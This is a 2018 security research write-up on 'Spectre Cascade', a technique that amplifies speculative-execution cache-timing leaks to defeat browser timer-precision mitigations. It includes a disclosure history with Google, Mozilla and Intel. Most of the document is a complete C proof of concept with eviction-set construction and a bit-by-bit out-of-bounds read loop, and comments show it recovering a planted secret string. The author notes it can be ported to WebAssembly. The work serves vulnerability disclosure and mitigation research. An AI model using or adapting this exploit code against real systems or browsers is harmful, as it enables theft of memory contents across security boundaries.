Spectre Cascade – there may be no safe timer mitigation

Created 9th February 2018

The Spectre side channel vulnerability that was disclosed in early January 2018 appeared to require access to very accurate timers in order to ex-filtrate data via the small side effects on the CPU cache. The techniques described here show that there may be no timer precision threshold below which the attack is blocked, and that reducing timer precision and fuzzing the timer may not even slow the rate at which this information can be leaked. A proof of concept is included that illustrates the technique, and it has been very effective on at least some Intel CPUs. The techniques may also add new tools to the art in this area. Obviously the technique does not work on all processors, but where the Spectre out-of-bounds vulnerability exists this technique appears likely to be effective too.

Mozilla disclosed the speculative execution side-channel attack on 4 January 2018, noting as mitigations for Firefox that the precision of performance.now() was reduced from 5μs to 20μs, and that the SharedArrayBuffer feature was disabled because it can be used to construct a high-resolution timer. The Mozilla blog post of 3 January 2018 also describes these mitigations landing for the new class of timing attack. The timer precision was given a configuration setting in bug 1424341, namely the privacy.reduceTimerPrecision and privacy.reduceTimerPrecision.microseconds preferences, but at the time of this publication that setting is still set at 20μsec.
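For illustration, the two preference names from bug 1424341 can be set in a standard Firefox user.js file; the value shown mirrors the 20μsec setting discussed above (the file fragment itself is illustrative, not part of this submission):

```javascript
// user.js sketch - preference names from bug 1424341, value per the
// 20 microsecond setting discussed above.
user_pref("privacy.reduceTimerPrecision", true);
user_pref("privacy.reduceTimerPrecision.microseconds", 20);
```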

The Google Chromium project landed changes to reduce the resolution of performance.now() from 5μs to 100μs and to add pseudorandom jitter on top, and the comments in that commit note “Deterministically clamp the time value time_seconds to a 100us interval to prevent timing attacks.”

The techniques described here are an extension of the Spectre side channel out-of-bounds vulnerability that bypasses mitigations limiting the accuracy of timers. This contribution is focused on the ex-filtration side of an attack, that is, leaking the small effects on the cache timing; an effective attack also requires infiltration, which is not considered here. By showing that the cache timing effects can be ex-filtrated, it is hoped that the critical importance of blocking infiltration will be recognized, rather than being seen as only defense in depth, and that the community will give more attention to code generation.

The timing effect on the cache from a load in a speculative path is small. Decreasing timer precision appears to be effective at blocking the measurement of such small times. In order to bypass such mitigations, a larger time difference needs to be created. One simple approach would be to load from a larger set of memory locations in the speculative path, tending to accumulate a cache state that leads to a larger timing difference when later measured in one block. This simple approach is limited by the practical impact that it can make on the cache: the cache size is limited, so there would still be a timer precision threshold that would block these measurements. Another challenge in such attacks is to have a supply of evicted cache lines with which to create speculation; the amount of memory that can be used for this is practically finite, and these loads might conflict with the cache timing effects that are being accumulated. This simple approach is also rather inefficient, having multiple stages: a probing and accumulating stage, followed by a measuring stage, and perhaps another stage to perform eviction.

The solution proposed here is to use loads within the speculative path to either reinforce or evict the set of addresses that are used to create the speculation in future iterations. This creates a feedback loop that can either keep the set being loaded in the cache, allowing the loop to run quickly, or alternatively load from other cache lines in the same set, tending to evict the set being loaded and causing the loop to run slowly. The result is a loop with a significantly different run time depending on the probes in a speculatively executed path. When the feedback tends to keep the set in the cache there will be less speculation and less probing, so to make sure some probing occurs, the lines are evicted at the start of each timing run. The timing difference is not limited and scales with the number of iterations; the number of iterations might be calibrated to achieve an adequate error rate on some known data. The technique does not suffer from the challenge of supplying an ongoing pool of evicted cache lines to generate speculation, as it is self sustaining, and it naturally reduces speculation in one of its states. The technique demonstrated in the proof of concept below uses only one cache set, so it does not clobber the cache either; it is a small and efficient loop producing a clear timing difference.

This technique creates a useful building block. A branch can depend on multiple loads, combined in one or more preceding two-input instructions, which means that speculation occurs if one load OR the other load is slow. This can be used to tune loop feedback and inputs, or to combine separate loops. Some of these approaches have been explored but were not needed for the proof of concept.

The technique might also be usable to store the results of probes and to convert a short period of probing into a timing difference measured over a much longer period of time. This has not yet been explored, but if workable it would expand the possibilities.

The loads in the speculative path might also be ordered or delayed to effectively measure some very fast event, and to ex-filtrate the result. This might be usable for measuring architectural differences, fingerprinting a system, etc. It has not been explored and it is not clear if it would be practical, but it is easy to see that there is potential here, given experience of how far speculation reaches.

This technique suits web deployment, an environment badly exposed to these attacks. The code is void of any instructions that would not be available to web code: it does not require a cache flush instruction or any barrier instructions, and it is self contained, performing its own eviction. While this PoC uses the Linux page map to generate a congruent cache set, the techniques for doing so are already well known and have been demonstrated to be workable in a web browser.

The PoC below is written in C, but similar code can be trivially compiled into asm.js or WebAssembly to run on the web. The timer precision is rounded to 20μs in the example, but to see that it can overcome larger mitigation times, just increase the number of iterations in the inner loop. It is capable of working past even the 100msec timer precision used in the Tor Browser, but the data rate might be so slow that 100msec is still an effective mitigation (so long as a faster timer can not be found or created).

This issue was disclosed to Google on 6 February 2018; it received a thank you and was closed as a duplicate. It was disclosed to Mozilla on the same day; they have so far been dismissive of the originality of the submission and the severity of the security problem, and have not even offered thanks. A few attempts were made to contact Intel for assistance with mitigations and they could not help; the issue was submitted to them on 6 February 2018 and received a thank you, with no further comment since. Web browsers depend on bounds checks to enforce security, they have only just started to address the code generation issues, and the timer mitigations appear to only slow data leaks.

/*
 * Copyright (c) WebLLL.org 2018.
 * Licensed under the Apache License, Version 2.0, January 2004 (the
 * "License"); you may not use this file except in compliance with the
 * License.  You may obtain a copy of the License at
 *      http://www.apache.org/licenses/
 * Spectre 'cascade' proof of concept.
 * This POC runs on Linux 64-bit. It may be built for 64 bit or 32 bit mode:
 * gcc -O -o cascade.out phycolor.c cascade.c
 * gcc -m32 -O -o cascade.out phycolor.c cascade.c
 * The Test machine runs a "Intel(R) Core(TM) i5-4690S CPU @ 3.20GHz"
 * This appears to have a 12 way L3 cache, and the POC is hard coded for this
 * size, although that is not a limitation of this technique.
 * The POC requires access to the Linux page maps to generate the congruent
 * cache sets, and this is generally not accessible, so to running the POC will
 * likely require extra privileges - this is not a limitation of the technique,
 * just a simplification for the PoC.
 * The output of the program on success will be:
 * Putting 'The Magic Words are Squeamish Ossifrage.' in memory
 * Reading 40 bytes:
 * Reading at malicious_x = 0xffffffffffddf530...  => 0x54='T'  0x54='T'
 * Reading at malicious_x = 0xffffffffffddf531...  => 0x68='h'  0x68='h'
 * Reading at malicious_x = 0xffffffffffddf532...  => 0x65='e'  0x65='e'
 * Reading at malicious_x = 0xffffffffffddf533...  => 0x20=' '  0x20=' '
 * Reading at malicious_x = 0xffffffffffddf534...  => 0x4D='M'  0x4D='M'
 * Reading at malicious_x = 0xffffffffffddf535...  => 0x61='a'  0x61='a'
 * Reading at malicious_x = 0xffffffffffddf536...  => 0x67='g'  0x67='g'
 * Reading at malicious_x = 0xffffffffffddf537...  => 0x69='i'  0x69='i'
 * Reading at malicious_x = 0xffffffffffddf538...  => 0x63='c'  0x63='c'
 * Reading at malicious_x = 0xffffffffffddf539...  => 0x20=' '  0x20=' '
 * Reading at malicious_x = 0xffffffffffddf53a...  => 0x57='W'  0x57='W'
 * Reading at malicious_x = 0xffffffffffddf53b...  => 0x6F='o'  0x6F='o'
 * Reading at malicious_x = 0xffffffffffddf53c...  => 0x72='r'  0x72='r'
 * Reading at malicious_x = 0xffffffffffddf53d...  => 0x64='d'  0x64='d'
 * Reading at malicious_x = 0xffffffffffddf53e...  => 0x73='s'  0x73='s'
 * Reading at malicious_x = 0xffffffffffddf53f...  => 0x20=' '  0x20=' '
 * Reading at malicious_x = 0xffffffffffddf540...  => 0x61='a'  0x61='a'
 * Reading at malicious_x = 0xffffffffffddf541...  => 0x72='r'  0x72='r'
 * Reading at malicious_x = 0xffffffffffddf542...  => 0x65='e'  0x65='e'
 * Reading at malicious_x = 0xffffffffffddf543...  => 0x20=' '  0x20=' '
 * Reading at malicious_x = 0xffffffffffddf544...  => 0x53='S'  0x53='S'
 * Reading at malicious_x = 0xffffffffffddf545...  => 0x71='q'  0x71='q'
 * Reading at malicious_x = 0xffffffffffddf546...  => 0x75='u'  0x75='u'
 * Reading at malicious_x = 0xffffffffffddf547...  => 0x65='e'  0x65='e'
 * Reading at malicious_x = 0xffffffffffddf548...  => 0x61='a'  0x61='a'
 * Reading at malicious_x = 0xffffffffffddf549...  => 0x6D='m'  0x6D='m'
 * Reading at malicious_x = 0xffffffffffddf54a...  => 0x69='i'  0x69='i'
 * Reading at malicious_x = 0xffffffffffddf54b...  => 0x73='s'  0x73='s'
 * Reading at malicious_x = 0xffffffffffddf54c...  => 0x68='h'  0x68='h'
 * Reading at malicious_x = 0xffffffffffddf54d...  => 0x20=' '  0x20=' '
 * Reading at malicious_x = 0xffffffffffddf54e...  => 0x4F='O'  0x4F='O'
 * Reading at malicious_x = 0xffffffffffddf54f...  => 0x73='s'  0x73='s'
 * Reading at malicious_x = 0xffffffffffddf550...  => 0x73='s'  0x73='s'
 * Reading at malicious_x = 0xffffffffffddf551...  => 0x69='i'  0x69='i'
 * Reading at malicious_x = 0xffffffffffddf552...  => 0x66='f'  0x66='f'
 * Reading at malicious_x = 0xffffffffffddf553...  => 0x72='r'  0x72='r'
 * Reading at malicious_x = 0xffffffffffddf554...  => 0x61='a'  0x61='a'
 * Reading at malicious_x = 0xffffffffffddf555...  => 0x67='g'  0x67='g'
 * Reading at malicious_x = 0xffffffffffddf556...  => 0x65='e'  0x65='e'
 * Reading at malicious_x = 0xffffffffffddf557...  => 0x2E='.'  0x2E='.'
 */
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <sys/mman.h>

struct sete {
    uint16_t index;
    uint16_t shift;
};

#define HITPOINTS 4096

struct set {
    size_t size;
    struct sete elem[HITPOINTS];
};

size_t set_offset(struct set *set, size_t i);
void add_set_offset(struct set *set, size_t i, size_t shift);
void add_from_set(struct set *dst, struct set *src, size_t index);
void print_set(struct set *set);
void print_set_phy(struct set *set);

#define MAX_BUFFER_PAGES 4096
extern struct set phy_sets[MAX_BUFFER_PAGES];
extern size_t next_phy_set;

#define PAGE_SIZE 0x1000

void init_pagemap(uint8_t *buffer, size_t size);
void phy_color_pages(uint8_t *buffer, size_t size);

// Timing support.
// This is limited to measuring time over a period, start to end, to fit with
// web timer options.

// Note: despite the name, this returns the time in microseconds.
uint64_t time_now_msec()
{
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);

    uint64_t msec = (ts.tv_sec * 1000000UL + ts.tv_nsec / 1000);

    return msec;
}

static volatile uint64_t start_time_msec;

void time_start()
{
    // Quantize to 20 usec as an example, however this technique will work with
    // much less accurate timers.
    start_time_msec = (time_now_msec() / 20) * 20;
}

uint32_t time_end()
{
    uint64_t end_time_msec = (time_now_msec() / 20) * 20;
    return end_time_msec - start_time_msec;
}

// This is an array which will be accessed out-of-bounds as an example.
size_t array1_size = 16;
uint8_t unused1[64]; // just some fill around array1
volatile uint8_t array1[160] = {0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0};
uint8_t unused2[64]; // just some fill around array1

// The data to be accessed via array1 above, out-of-bounds.
char* secret = "The Magic Words are Squeamish Ossifrage.";

// A string of characters with an equal number of ones and zeros; a quick calibration hack.
char* calib_string = "UUUUUUUU";

// A large buffer, page aligned, holding at least one cache congruent set.
volatile uint8_t *array2;

// Data, stored in a separate cache set, that is expected to always be loaded.
struct cycledat {
    // Offset of line to sample from subset A.
    uint32_t offset1;

    // Load offsets on the post-branch path. The first 16 are offsets loaded on
    // either a branch training cycle, or a malicious bit zero, and are offsets
    // in subset A which reinforce the loading and retention of this subset in
    // the cache set. The later 16 are loaded on a malicious bit one path, and
    // are from subset B and are loaded to evict subset A from the cache.
    uint32_t evict[32];
};

// This is the number of elements in subset A to cycle over. The test computer
// has a 12 way L3 cache, but when cycling over all of these some excess
// evictions were observed in the state in which evictions were not
// expected. This might be due to other uses of the set or perhaps the
// prefetcher. In any case lowering this slightly might give a better signal to
// noise ratio.
#define CYCLE_SIZE 11

// The addresses to use are dynamically generated in this POC.  These should be
// placed in a set distinct from the set being cycled over - that seems unlikely
// for this POC, so it omits that logic.
struct cycledat cycle_info[CYCLE_SIZE];

// Helper to stop code elimination.
volatile uint32_t temp;

// This function is the core of the submission, a loop with a distinctly
// different run time based on the cache state, by creating a feedback loop.
// One 'bit' is sampled at the malicious offset.
uint32_t readMemoryBit(size_t malicious_x, uint8_t bit)
{
    // Load all the data needed, trying to get it cached.
    for (size_t n = 0; n < 100; n++) {
        for (size_t i = 0; i < CYCLE_SIZE; i++) {
            struct cycledat *info = &cycle_info[i];
            for (size_t j = 0; j < 32; j++) {
                temp &= info->evict[j];
            }
            // Load the subset B cache set lines, tending to evict subset A
            // lines and thus generate early branch speculation to probe the
            // malicious address.
            for (size_t j = 16; j < 32; j++) {
                temp &= array2[info->evict[j]];
            }
        }
    }

    // Time in one block.
    time_start();
    size_t cycle_index = 0;
    uint32_t rng = 1;

    // The number of iterations can be increased to overcome timer mitigation
    // and there is no limit.
    for (size_t tries = 1; tries < 20000; tries++) {
        // Pseudo random number generator to defeat branch prediction below.
        rng ^= rng << 13;
        rng ^= rng >> 17;
        rng ^= rng << 5;

        // Occasionally and randomly generate a mask=-1 else mask=0 These are
        // the occasions at which the branch has been trained to miss and the
        // malicious access occurs.
        size_t mask = ((rng & 0x0fUL) - 1UL) & ~0xffffUL;
        mask = (mask | (mask >> 16));

        // Cycle through subset A.
        cycle_index = (cycle_index + (mask & 1)) % CYCLE_SIZE;

        // When the mask is set, swap the training index of zero for the
        // malicious index that may accessed out of bounds.
        size_t x = mask & malicious_x;

        struct cycledat *info = &cycle_info[cycle_index];

        // The addresses are loaded from cached memory, so can be dynamically
        // generated and ordered to avoid the pre-fetcher.
        size_t index = info->offset1;

        // *** This is the load that causes the branch speculation that is exploited. ***
        // It loads from an element of set A.
        size_t e = array2[index];

        if (x < e) {
            // This path is taken during training and hopefully also when
            // probing the malicious address. When training x is zero and within
            // bounds. No eviction occurs during training. Eviction only occurs
            // on a probe and if the bit probed is a one.
            uint8_t v = array1[x];

            // Extract the bit of interest and convert to an index into the eviction set.
            v = (v >> bit) & mask & 1;
            size_t w = v * 16;

            // Load from the one of two subsets, either re-inforcing subset A or evicting subset A.
            array2[info->evict[w + 1]];
            array2[info->evict[w + 2]];
            array2[info->evict[w + 3]];
            array2[info->evict[w + 4]];
            array2[info->evict[w + 5]];
            array2[info->evict[w + 6]];
            array2[info->evict[w + 7]];
            array2[info->evict[w + 8]];
            array2[info->evict[w + 9]];
            array2[info->evict[w + 10]];
            array2[info->evict[w + 11]];
            array2[info->evict[w + 12]];
            array2[info->evict[w + 13]];
            array2[info->evict[w + 14]];
            array2[info->evict[w + 15]];

        }
    }

    return time_end();
}

// Much of the code below is not critical to the submission. It adds a skeleton
// to calibrate the times at the start and to repeat measurements to reduce
// errors, but there are many alternative approaches such as continuous
// calibration.

// How many times to repeat the above measurement to reduce noise.
#define RETRIES 4

uint32_t calibrate()
{
    uint32_t sum = 0;

    // Time a string of characters with an equal number of ones and zeros and take
    // the average for calibration. This might drift if the CPU frequency or load
    // changes - it is sufficient for a POC.
    size_t malicious_x = (size_t)(calib_string - (char *)array1);
    ssize_t len = strlen(calib_string);

    for (size_t j = 0; j < len; j++) {
        for (size_t i = 0; i < 8; i++) {
            uint32_t min_time = 0xffffffff;
            for (size_t k = 0; k < RETRIES * 2; k++) {
                uint32_t time = readMemoryBit(malicious_x, i);
                if (time < min_time) {
                    min_time = time;
                }
            }
            sum += min_time;
        }
    }

    return sum / (len * 8);
}

uint32_t run(size_t malicious_x, ssize_t len)
{
    uint32_t calib = calibrate();

    printf("Reading %zd bytes:\n", len);
    while (--len >= 0) {
        printf("Reading at malicious_x = %p... ", (void *)malicious_x);
        uint8_t byte = 0;

        uint32_t min_times[8];
        for (size_t i = 0; i < 8; i++) {
            min_times[i] = 0xffffffff;
        }
        for (size_t k = 0; k < RETRIES; k++) {
            // Could also perform some calibration samples
            for (size_t i = 0; i < 8; i++) {
                uint32_t time = readMemoryBit(malicious_x, i);
                if (time < min_times[i]) {
                    min_times[i] = time;
                }
            }

            // Could analyse the samples and repeat if quality issues are detected.
            byte = 0;
            for (size_t i = 0; i < 8; i++) {
                uint8_t bit = min_times[i] > calib;
                byte |= bit << i;
            }
        }

        printf(" => 0x%02X='%c'  0x%02X='%c'\n", array1[malicious_x], array1[malicious_x], byte, byte);
        malicious_x++;
    }

    return 0;
}

int main(int argc, const char **argv)
{
    size_t array2_len = 0x2000000;

    array2 = mmap(NULL, array2_len, PROT_READ | PROT_WRITE, MAP_PRIVATE
                  | MAP_ANONYMOUS | MAP_POPULATE, -1, 0);

    // Find congruent sets. These addresses are deliberately spaced apart which
    // appears to defeat negative impacts of pre-fetching.
    // On the web an alternative is needed, but the methods are well published
    // and do not depend on the measurement of small times, that is a potential
    // congruent set can be walked as many times as need to generate a
    // significant time to overcome timer mitigation although this can be
    // slowed. The 20usec mitigation time is far from sufficient to slow this
    // discovery in practice.
    init_pagemap((void *)array2, array2_len);
    phy_color_pages((void *)array2, array2_len);

    // Choose a set to experiment with, just use the first.
    struct set *set = &phy_sets[0];

    size_t set_size = set->size;
    if (set_size >= 128) {
        set_size = 128;
    }

    // Divide this set into two.

    size_t subset_a[CYCLE_SIZE];
    size_t subset_b[128];
    size_t subset_b_size = 0;

    // Subset A.
    for (size_t i = 0; i < CYCLE_SIZE; i++) {
        subset_a[i] = set_offset(set, i);
    }

    // Subset B - all the rest.
    // A sufficiently large congruent set is required.
    for (size_t i = 0; i < 128; i++) {
        size_t j = i + CYCLE_SIZE;
        if (j >= set_size) {
            subset_b_size = i;
            break;
        }
        subset_b[i] = set_offset(set, j);
    }

    // Set up the cycleinfo.  This data is expected to be retained in the
    // cache. It holds the target addresses from which to load.

    // The main loop cycles through subset A of the congruent set. These are the
    // lines read by the load causing the exploited branch.  The set must be at
    // most the number of cache ways, and setting this a little less was found
    // to be helpful. These address are stored in the 'offset1' slot.
    for (size_t i = 0; i < CYCLE_SIZE; i += 1) {
        cycle_info[i].offset1 = subset_a[i];
    }

    // The post-branch code path reads from one of two subsets and one is subset
    // A. This is the same set as defined just above, and loading these in the
    // post-branch path helps load and retain these lines in the cache set,
    // which in turn avoids a delayed load leading to a faster run time for the
    // loop - self reinforcing.
    for (size_t i = 0; i < CYCLE_SIZE; i++) {
        for (size_t j = 0; j < 16; j++) {
            size_t k = (i + j + 1) % CYCLE_SIZE;
            cycle_info[i].evict[j] = cycle_info[k].offset1;
        }
    }

    // The post-branch code path may read from an alternative subset B. Loading
    // this subset tends to evict the lines of subset A which cause a delayed
    // load by the main loop and slows the run time for the main loop. When
    // subset A is evicted this also supports the branch speculation need for
    // the malicious probing, the infiltration.
    size_t next_b = 0;
    for (size_t i = 0; i < CYCLE_SIZE; i++) {
        size_t next_b2 = next_b;
        next_b += 3;
        if (next_b >= subset_b_size) {
            next_b -= subset_b_size;
        }
        for (size_t j = 16; j < 32; j++) {
            cycle_info[i].evict[j] = subset_b[next_b2];
            next_b2++;
            if (next_b2 >= subset_b_size) {
                next_b2 -= subset_b_size;
            }
        }
    }

    printf("Putting '%s' in memory\n", secret);
    size_t malicious_x = (size_t)(secret - (char *)array1);
    size_t len = strlen(secret);

    // Fill array2 so that every element holds the array1 length used as the
    // bounds limit in readMemoryBit.
    for (size_t i = 0; i < array2_len; i++) {
        array2[i] = 16;
    }

    run(malicious_x, len);

    return 0;
}
/*
 * Copyright (c) WebLLL.org 2018.
 * Licensed under the Apache License, Version 2.0, January 2004 (the
 * "License"); you may not use this file except in compliance with the
 * License.  You may obtain a copy of the License at
 *      http://www.apache.org/licenses/
 * Support for using the physical address to determine a page color
 * and to build congruent cache sets. This would obviously not work on
 * the web, but time base discovery methods are well published, and
 * this file is not an original part of this submission. The code here
 * is quick and reliable allowing focus on the other code, and a
 * simple POC.
 */

#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdbool.h>
#include <sys/mman.h>
#include <inttypes.h>

#define SET_SIZE 4096

struct sete {
    uint16_t index;
    uint16_t shift;
};

struct set {
    size_t size;
    struct sete elem[SET_SIZE];
};

size_t set_offset(struct set *set, size_t i)
{
    struct sete *elem = &set->elem[i];
    return elem->index << elem->shift;
}

void add_set_offset(struct set *set, size_t i, size_t shift)
{
    size_t size = set->size;
    struct sete *elem = &set->elem[size];
    elem->index = i;
    elem->shift = shift;
    set->size = size + 1;
}

void add_from_set(struct set *dst, struct set *src, size_t index)
{
    size_t dst_size = dst->size;
    struct sete *dst_elem = &dst->elem[dst_size];
    struct sete *src_elem = &src->elem[index];
    dst_elem->index = src_elem->index;
    dst_elem->shift = src_elem->shift;
    dst->size = dst_size + 1;
}

// The target cache ways is hard coded - adapt to the development system.
#define CACHE_WAYS 12

#define PAGE_SIZE 4096
#define PAGE_SIZE_SHIFT 12
int g_pagemap_fd = -1;

// Pre-loaded page map
#define MAX_BUFFER_PAGES 8192
static uint64_t pagemap[MAX_BUFFER_PAGES];

static uint8_t *mapped_buffer;
static size_t mapped_buffer_size;

uint64_t get_physical_addr(uintptr_t virtual_addr);

void init_pagemap(uint8_t *buffer, size_t size) {
    size_t pages = size / PAGE_SIZE;

    g_pagemap_fd = open("/proc/self/pagemap", O_RDONLY);
    if (g_pagemap_fd < 0) {
        printf("Error opening pagemap\n");
        return;
    }

    if (pages > MAX_BUFFER_PAGES) {
        printf("error pagemap too small: requires %zu pages, capacity %d\n",
               pages, MAX_BUFFER_PAGES);
        return;
    }

    mapped_buffer = buffer;
    mapped_buffer_size = size;

    // Make sure it is all paged in.
    for (size_t n = 0; n < size; n += PAGE_SIZE) {
        mapped_buffer[n] = 1;
    }

    for (size_t i = 0; i < pages; i++) {
        uintptr_t virtual_addr = ((uintptr_t)buffer) + i * PAGE_SIZE;
        off_t offset = (virtual_addr / PAGE_SIZE) * 8;
        uint64_t value;
        int got = pread(g_pagemap_fd, &value, 8, offset);
        if (got != 8) {
            printf("error read %u %zx %"PRIxPTR" %lx %zu %p\n", got, i, virtual_addr, offset, mapped_buffer_size / PAGE_SIZE, buffer);
        }
        uint64_t frame_num = value & ((1ULL << 54) - 1);
        if (frame_num == 0) {
            printf("error physical address undefined for virtual address %"PRIxPTR"\n", virtual_addr);
        }
        if ((value & (1ULL << 63)) == 0) {
            printf("page not present vaddr %"PRIxPTR"\n", virtual_addr);
        }
        pagemap[i] = value;
    }
}

uint64_t get_physical_addr(uintptr_t virtual_addr) {
    off_t page = (virtual_addr - (uintptr_t)(mapped_buffer)) / PAGE_SIZE;

    if (page >= (off_t)(mapped_buffer_size / PAGE_SIZE)) {
        printf("get_physical_addr outside buffer %"PRIxPTR"\n", virtual_addr);
        return 0;
    }
    uint64_t frame_num = pagemap[page] & ((1ULL << 54) - 1);
    return (frame_num * PAGE_SIZE) | (virtual_addr & (PAGE_SIZE - 1));
}

int get_cache_slice(uint64_t phys_addr, int bad_bit) {
    // From: Reverse Engineering Intel Last-Level Cache Complex Addressing Using Performance Counters

    static const int bits1[] = { 6, 10, 12, 14, 16, 17, 18, 20, 22, 24, 25, 26, 27, 28, 30, 32, 33 };
    static const int bits2[] = { 7, 11, 13, 15, 17, 19, 20, 21, 22, 23, 24, 26, 28, 29, 31, 33, 34 };

    int count = sizeof(bits1) / sizeof(bits1[0]);
    int h1 = 0, h2 = 0;
    for (int i = 0; i < count; i++) {
        h1 ^= (phys_addr >> bits1[i]) & 1;
        h2 ^= (phys_addr >> bits2[i]) & 1;
    }
    if (bad_bit != -1) {
        h1 ^= (phys_addr >> bad_bit) & 1;
    }
    return (h1 << 1) | h2;
}

bool in_same_cache_set(uint64_t phys1, uint64_t phys2, int bad_bit) {
    // Assume the bottom 17 bits determine the cache set within the cache
    // slice, with the low 6 bits being the offset within the line.
    uint64_t mask = (((uint64_t) 1 << 17) - 1) & ~0x3f;
    int slice1 = get_cache_slice(phys1, bad_bit);
    int slice2 = get_cache_slice(phys2, bad_bit);
    return ((phys1 & mask) == (phys2 & mask) && (slice1 == slice2));
}

int make_cache_set(struct set *set, size_t index0, int addr_count)
{
    set->size = 0;
    uint64_t phys1 = get_physical_addr((uintptr_t)&mapped_buffer[index0 * PAGE_SIZE]);
    add_set_offset(set, index0, PAGE_SIZE_SHIFT);
    size_t max_pages = mapped_buffer_size / PAGE_SIZE;

    int found = 1;
    size_t index = 1;
    while (found < addr_count) {
        if (index >= max_pages) {
            printf("failed %zu %zu\n", index, max_pages);
            return 0;
        }
        if (index == index0) {
            index++;
            continue;
        }
        uintptr_t addr = (uintptr_t)&mapped_buffer[index * PAGE_SIZE];
        uint64_t phys2 = get_physical_addr(addr);
        if (in_same_cache_set(phys1, phys2, -1)) {
            add_set_offset(set, index, PAGE_SIZE_SHIFT);
            found++;
        }
        index++;
    }

    return 1;
}

// Could limit this to 128 for some CPUs
struct set phy_sets[MAX_BUFFER_PAGES];
size_t next_phy_set = 0;

static struct set * page_sets[MAX_BUFFER_PAGES];

void phy_color_pages(uint8_t *buffer, size_t size)
{
    memset(page_sets, 0, sizeof(page_sets));

    size_t base_page = 0;
    for (;; base_page++) {
        // Find the next page not yet assigned to a set.
        for (; base_page < mapped_buffer_size / PAGE_SIZE; base_page++) {
            if (page_sets[base_page] == NULL) {
                break;
            }
        }
        if (base_page >= mapped_buffer_size / PAGE_SIZE) {
            break;
        }

        if (make_cache_set(&phy_sets[next_phy_set], base_page, CACHE_WAYS)) {
            for (size_t i = 0; i < phy_sets[next_phy_set].size; i++) {
                size_t index = phy_sets[next_phy_set].elem[i].index;
                size_t shift = phy_sets[next_phy_set].elem[i].shift;
                size_t page = (index << shift) / PAGE_SIZE;
                page_sets[page] = &phy_sets[next_phy_set];
            }

            uint64_t base_phys = get_physical_addr((uintptr_t)&mapped_buffer[base_page * PAGE_SIZE]);
            for (size_t page = 0; page < mapped_buffer_size / PAGE_SIZE; page++) {
                if (page_sets[page] == NULL) {
                    uint64_t page_phys = get_physical_addr((uintptr_t)&mapped_buffer[page * PAGE_SIZE]);
                    int check = in_same_cache_set(base_phys, page_phys, -1);

                    if (check) {
                        add_set_offset(&phy_sets[next_phy_set], page, PAGE_SIZE_SHIFT);
                        page_sets[page] = &phy_sets[next_phy_set];
                    }
                }
            }
            next_phy_set++;
        } else {
            printf("failed to make set from page %zu\n", base_page);
        }
    }
}